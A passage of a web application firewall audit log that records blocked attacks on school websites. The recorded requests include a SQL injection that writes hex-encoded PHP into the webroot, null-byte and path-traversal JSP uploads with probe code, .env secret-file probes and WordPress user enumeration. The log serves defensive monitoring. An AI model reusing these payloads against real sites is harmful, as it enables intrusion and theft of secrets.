10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Upgrade-Insecure-Requests: 1 --01a6326b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01a6326b-E-- --01a6326b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||222.77.136.93|F|2"] [data "Matched Data: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi' found within MATCHED_VAR: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi'"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907310927903 5672 (- - -) Stopwatch2: 1747907310927903 5672; combined=3795, p1=549, p2=3185, p3=0, p4=0, p5=61, sr=128, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01a6326b-Z-- --0b360010-A-- [22/May/2025:16:48:30 +0700] aC7y7mfriXjg62qQwE9jmgAAAIQ 103.236.140.4 49176 103.236.140.4 8181 --0b360010-B-- POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=wahaaqzbta.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 27 User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202) Accept: */* Accept-Language: en Content-Encoding: UTF_8 Content-Type: application/octet-stream serverEnable: localserver X-Forwarded-For: 45.32.66.146 Cookie: LA_K1=langid X-Varnish: 168122827 --0b360010-C-- 2xQufet7slhcePnWnsiM5YP4rrJ --0b360010-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b360010-E-- --0b360010-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=wahaaqzbta.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907310929711 4252 (- - -) Stopwatch2: 1747907310929711 4252; combined=2410, p1=562, p2=1809, p3=0, p4=0, p5=39, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b360010-Z-- --c93f8471-A-- [22/May/2025:16:48:30 +0700] aC7y7iektx75wRFPQyj7UQAAANI 103.236.140.4 49184 103.236.140.4 8181 --c93f8471-B-- POST /portal/pt/servlet/saveImageServlet/doPost?pageId=login&filename=../rnybpglt.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/octet-stream X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 165938556 --c93f8471-C-- file error --c93f8471-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c93f8471-E-- --c93f8471-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=../rnybpglt.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907310930969 3533 (- - -) Stopwatch2: 1747907310930969 3533; combined=1968, p1=587, p2=1344, p3=0, p4=0, p5=37, sr=93, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c93f8471-Z-- --8cbd8e01-A-- [22/May/2025:16:48:30 +0700] aC7y7iektx75wRFPQyj7UwAAAMI 103.236.140.4 49190 103.236.140.4 8181 --8cbd8e01-B-- POST /uapws/saveDoc.ajax?ws=/../../fyw6z.jspx%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 314 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166593722 --8cbd8e01-C-- content= out.println("vsilhmpzse");new java.io.File(application.getRealPath(request.getServletPath())).delete(); --8cbd8e01-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cbd8e01-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:ws outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:ws=/../../fyw6z.jspx\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907310933754 3408 (- - -) Stopwatch2: 1747907310933754 3408; combined=2243, p1=435, p2=1780, p3=0, p4=0, p5=27, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cbd8e01-Z-- --0ce9c80f-A-- [22/May/2025:16:51:13 +0700] aC7zkWfriXjg62qQwE9jpQAAAIM 103.236.140.4 49278 103.236.140.4 8181 --0ce9c80f-B-- POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=mluhmcfe.jsp&filename=1.jpg HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 250 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Content-Type: multipart/form-data Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 168122836 --0ce9c80f-C-- ------WebKitFormBoundary92pUawKc Content-Disposition: form-data; name="myFile";filename="test.jpg" <% out.println("fooiqjzoyn");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ------WebKitFormBoundary92pUawKc-- --0ce9c80f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ce9c80f-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747907473939153 5872 (- - -) Stopwatch2: 1747907473939153 5872; combined=4738, p1=433, p2=4273, p3=0, p4=0, p5=32, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ce9c80f-Z-- --d35b9a49-A-- [22/May/2025:17:06:31 +0700] aC73J30O04WKE1HJ5iR0EwAAAAc 103.236.140.4 49796 103.236.140.4 8181 --d35b9a49-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --d35b9a49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d35b9a49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747908391828816 879 (- - -) Stopwatch2: 1747908391828816 879; combined=354, p1=310, p2=0, p3=0, p4=0, p5=43, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d35b9a49-Z-- --9ca49644-A-- [22/May/2025:17:12:36 +0700] aC74lOThJmFSRJ5-OZfYMgAAAFI 103.236.140.4 50016 103.236.140.4 8181 --9ca49644-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.51.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.51.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9ca49644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ca49644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747908756655458 3055 (- - -) Stopwatch2: 1747908756655458 3055; combined=1333, p1=458, p2=841, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ca49644-Z-- --0f7f706f-A-- [22/May/2025:17:15:14 +0700] aC75MuThJmFSRJ5-OZfYPQAAAFQ 103.236.140.4 50112 103.236.140.4 8181 --0f7f706f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G935F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --0f7f706f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f7f706f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747908914030236 675 (- - -) Stopwatch2: 1747908914030236 675; combined=296, p1=265, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f7f706f-Z-- --1692f729-A-- [22/May/2025:17:15:32 +0700] aC75RGfriXjg62qQwE9j4AAAAJE 103.236.140.4 50134 103.236.140.4 8181 --1692f729-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-N950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --1692f729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1692f729-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747908932319019 833 (- - -) Stopwatch2: 1747908932319019 833; combined=367, p1=326, p2=0, p3=0, p4=0, p5=41, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1692f729-Z-- --d1ef625b-A-- [22/May/2025:17:26:07 +0700] aC77v-ThJmFSRJ5-OZfYVgAAAEQ 103.236.140.4 50468 103.236.140.4 8181 --d1ef625b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.62.39.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.62.39.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1ef625b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1ef625b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747909567107062 3023 (- - -) Stopwatch2: 1747909567107062 3023; combined=1344, p1=466, p2=848, p3=0, p4=0, p5=29, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1ef625b-Z-- --4f6fea64-A-- [22/May/2025:17:26:13 +0700] aC77xeThJmFSRJ5-OZfYVwAAAFc 103.236.140.4 50478 103.236.140.4 8181 --4f6fea64-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --4f6fea64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f6fea64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747909573977136 762 (- - -) Stopwatch2: 1747909573977136 762; combined=338, p1=296, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f6fea64-Z-- --7570477d-A-- [22/May/2025:17:32:43 +0700] aC79S-ThJmFSRJ5-OZfYaQAAAFI 103.236.140.4 50706 103.236.140.4 8181 --7570477d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.160.28.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.160.28.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7570477d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7570477d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747909963974163 3060 (- - -) Stopwatch2: 1747909963974163 3060; combined=1367, p1=480, p2=853, p3=0, p4=0, p5=34, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7570477d-Z-- --3b899a14-A-- [22/May/2025:17:51:19 +0700] aC8Bpyektx75wRFPQyj8cgAAAMI 103.236.140.4 51378 103.236.140.4 8181 --3b899a14-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 134.122.28.88 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 134.122.28.88 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --3b899a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b899a14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747911079897506 848 (- - -) Stopwatch2: 1747911079897506 848; combined=302, p1=264, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b899a14-Z-- --ddc68207-A-- [22/May/2025:18:22:46 +0700] aC8JBuThJmFSRJ5-OZfY_AAAAEc 103.236.140.4 52394 103.236.140.4 8181 --ddc68207-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 120.138.19.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 120.138.19.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ddc68207-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddc68207-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747912966798284 3377 (- - -) Stopwatch2: 1747912966798284 3377; combined=1462, p1=464, p2=965, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddc68207-Z-- --4c8d6568-A-- [22/May/2025:18:36:02 +0700] aC8MIn0O04WKE1HJ5iR0-wAAABE 103.236.140.4 52856 103.236.140.4 8181 --4c8d6568-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4c8d6568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8d6568-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913762111746 933 (- - -) Stopwatch2: 1747913762111746 933; combined=354, p1=311, p2=0, p3=0, p4=0, p5=43, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8d6568-Z-- --86400140-A-- [22/May/2025:18:36:03 +0700] aC8MI-ThJmFSRJ5-OZfZngAAAFY 103.236.140.4 52860 103.236.140.4 8181 --86400140-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --86400140-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86400140-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747913763239267 753 (- - -) Stopwatch2: 1747913763239267 753; combined=292, p1=255, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86400140-Z-- --bf78c561-A-- [22/May/2025:18:36:04 +0700] aC8MJOThJmFSRJ5-OZfZnwAAAEM 103.236.140.4 52862 103.236.140.4 8181 --bf78c561-B-- GET /.env.prod HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.101 X-Forwarded-Proto: https Connection: close User-agent: 